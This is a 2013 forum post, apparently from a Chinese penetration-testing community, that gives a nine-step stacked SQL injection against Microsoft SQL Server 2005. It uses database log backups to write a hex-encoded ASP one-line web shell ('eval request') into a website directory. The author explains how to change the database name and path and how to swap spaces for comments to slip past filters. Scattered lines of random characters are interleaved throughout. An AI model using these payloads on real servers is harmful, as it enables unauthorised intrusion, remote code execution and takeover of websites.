中国网络渗透测试联盟
标题:
mssql2005 DB权限导出一句话
[打印本页]
作者:
admin
时间:
2013-7-16 20:32
标题:
mssql2005 DB权限导出一句话
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
4 e/ U( x3 q: ?7 _6 {
5 D0 n3 x9 k6 _. }+ `, a
& r2 z( w! s6 u, ^+ i% u
后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
6 U* C0 O% f f8 ]7 B
/ r* w9 P; L9 ]
第一步
& N; h+ {% k; T/ k7 z' c
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
1 g# L% b4 m/ k: \" q
( } O3 s5 I: F' e% \' q5 F# p4 i
第二步:
- A {. i4 y# D. y; B5 a, R
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
, O1 i5 f* W q2 F0 \1 k
2 T" N! c7 ?1 E0 x* U7 v
第三步
! j' ~; e' Z! f) J2 u7 X4 J/ Q
;drop/**/table/**/[itpro]--
: Z. @& j1 v, N! q
. V$ u5 t% N1 m, G
第四步
+ F0 W. [2 l- S- d
;create/**/table/**/[itpro]([a]/**/image)--
- h/ ~6 J. K# y2 F+ ]
' h; _/ b; Z& P# a
第五步
4 E8 x; P8 _" B3 J- ^1 P
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
; m1 F9 a) l7 y
8 f8 T9 }0 M: q
第六步
6 X! ^/ v, \. R5 P
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
! E1 M1 T% |2 H/ s
7 i! S0 f7 X1 C, Y2 z3 c, A
第七步
* d/ F+ u6 e* `* h" q
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
( i' I E% U/ H# V' M
: Z1 e2 w+ M6 H
第八步
8 e* @0 n" Y# A4 V; x% z5 O
;drop/**/table/**/[itpro]--
' G3 D' w) T( m I
1 }; t+ [9 h [' a G3 B3 h8 I
第九步
6 P4 J- V' e" ?6 a5 }. `1 i
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
( a- I& E2 `, H9 s+ C2 ]- q
# E1 @' h; k) C' c6 r
其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
$ K7 f% m( N8 ], f
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2